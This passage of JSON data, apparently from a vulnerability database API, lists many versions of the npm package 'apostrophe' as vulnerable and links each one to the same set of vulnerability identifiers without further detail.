ID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.149"},{"url":"http://public2.vulnerablecode.io/api/packages/268003?format=json","purl":"pkg:npm/apostrophe@0.4.152","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.152"},{"url":"http://public2.vulnerablecode.io/api/packages/268004?format=json","purl":"pkg:npm/apostrophe@0.4.154","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.154"},{"url":"http://public2.vulnerablecode.io/api/packages/268005?format=json","purl":"pkg:npm/apostrophe@0.4.155","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.155"},{"url":"http://public2.vulnerablecode.io/api/packages/268006?format=json","purl":"pkg:npm/apostrophe@0.4.156","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.156"},{"url":"http://public2.vulnerablecode.io/api/packages/268007?format=json","purl":"pkg:npm/apostrophe@0.4.157","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.157"},{"url":"http://public2.vulnerablecode.io/api/packages/268008?format=json","purl":"pkg:npm/apostrophe@0.4.158","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.158"},{"url":"http://public2.vulnerablecode.io/api/packages/268009?format=json","purl":"pkg:npm/apostrophe@0.4.159","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.159"},{"url":"http://public2.vulnerablecode.io/api/packages/268010?format=json","purl":"pkg:npm/apostrophe@0.4.160","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.160"},{"url":"http://public2.vulnerablecode.io/api/packages/268011?format=json","purl":"pkg:npm/apostrophe@0.4.161","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.161"},{"url":"http://public2.vulnerablecode.io/api/packages/268012?format=json","purl":"pkg:npm/apostrophe@0.4.162","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.162"},{"url":"http://public2.vulnerablecode.io/api/packages/268013?format=json","purl":"pkg:npm/apostrophe@0.4.163","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.163"},{"url":"http://public2.vulnerablecode.io/api/packages/268014?format=json","purl":"pkg:npm/apostrophe@0.4.164","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.164"},{"url":"http://public2.vulnerablecode.io/api/packages/268015?format=json","purl":"pkg:npm/apostrophe@0.4.165","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.165"},{"url":"http://public2.vulnerablecode.io/api/packages/268016?format=json","purl":"pkg:npm/apostrophe@0.4.166","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.166"},{"url":"http://public2.vulnerablecode.io/api/packages/268017?format=json","purl":"pkg:npm/apostrophe@0.4.167","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.167"},{"url":"http://public2.vulnerablecode.io/api/packages/268018?format=json","purl":"pkg:npm/apostrophe@0.4.168","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.168"},{"url":"http://public2.vulnerablecode.io/api/packages/268019?format=json","purl":"pkg:npm/apostrophe@0.4.169","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.169"},{"url":"http://public2.vulnerablecode.io/api/packages/268020?format=json","purl":"pkg:npm/apostrophe@0.4.170","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.170"},{"url":"http://public2.vulnerablecode.io/api/packages/268021?format=json","purl":"pkg:npm/apostrophe@0.4.171","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.171"},{"url":"http://public2.vulnerablecode.io/api/packages/268022?format=json","purl":"pkg:npm/apostrophe@0.4.172","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.172"},{"url":"http://public2.vulnerablecode.io/api/packages/268023?format=json","purl":"pkg:npm/apostrophe@0.4.173","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.173"},{"url":"http://public2.vulnerablecode.io/api/packages/268024?format=json","purl":"pkg:npm/apostrophe@0.4.174","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.174"},{"url":"http://public2.vulnerablecode.io/api/packages/268025?format=json","purl":"pkg:npm/apostrophe@0.4.175","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.175"},{"url":"http://public2.vulnerablecode.io/api/packages/268026?format=json","purl":"pkg:npm/apostrophe@0.4.176","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.176"},{"url":"http://public2.vulnerablecode.io/api/packages/268027?format=json","purl":"pkg:npm/apostrophe@0.4.177","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.177"},{"url":"http://public2.vulnerablecode.io/api/packages/268028?format=json","purl":"pkg:npm/apostrophe@0.4.179","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.179"},{"url":"http://public2.vulnerablecode.io/api/packages/268029?format=json","purl":"pkg:npm/apostrophe@0.4.180","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.180"},{"url":"http://public2.vulnerablecode.io/api/packages/268030?format=json","purl":"pkg:npm/apostrophe@0.4.181","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.181"},{"url":"http://public2.vulnerablecode.io/api/packages/268031?format=json","purl":"pkg:npm/apostrophe@0.4.182","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.182"},{"url":"http://public2.vulnerablecode.io/api/packages/268032?format=json","purl":"pkg:npm/apostrophe@0.4.183","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.183"},{"url":"http://public2.vulnerablecode.io/api/packages/268033?format=json","purl":"pkg:npm/apostrophe@0.4.184","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.184"},{"url":"http://public2.vulnerablecode.io/api/packages/268034?format=json","purl":"pkg:npm/apostrophe@0.4.185","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.185"},{"url":"http://public2.vulnerablecode.io/api/packages/268035?format=json","purl":"pkg:npm/apostrophe@0.4.186","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.186"},{"url":"http://public2.vulnerablecode.io/api/packages/268036?format=json","purl":"pkg:npm/apostrophe@0.4.187","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.187"},{"url":"http://public2.vulnerablecode.io/api/packages/268037?format=json","purl":"pkg:npm/apostrophe@0.4.188","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.188"},{"url":"http://public2.vulnerablecode.io/api/packages/268038?format=json","purl":"pkg:npm/apostrophe@0.4.189","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.189"},{"url":"http://public2.vulnerablecode.io/api/packages/268039?format=json","purl":"pkg:npm/apostrophe@0.4.190","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.190"},{"url":"http://public2.vulnerablecode.io/api/packages/268040?format=json","purl":"pkg:npm/apostrophe@0.4.191","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.191"},{"url":"http://public2.vulnerablecode.io/api/packages/268041?format=json","purl":"pkg:npm/apostrophe@0.4.192","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.192"},{"url":"http://public2.vulnerablecode.io/api/packages/268042?format=json","purl":"pkg:npm/apostrophe@0.4.194","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.194"},{"url":"http://public2.vulnerablecode.io/api/packages/268043?format=json","purl":"pkg:npm/apostrophe@0.4.195","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.195"},{"url":"http://public2.vulnerablecode.io/api/packages/268044?format=json","purl":"pkg:npm/apostrophe@0.4.196","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.196"},{"url":"http://public2.vulnerablecode.io/api/packages/268045?format=json","purl":"pkg:npm/apostrophe@0.4.197","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-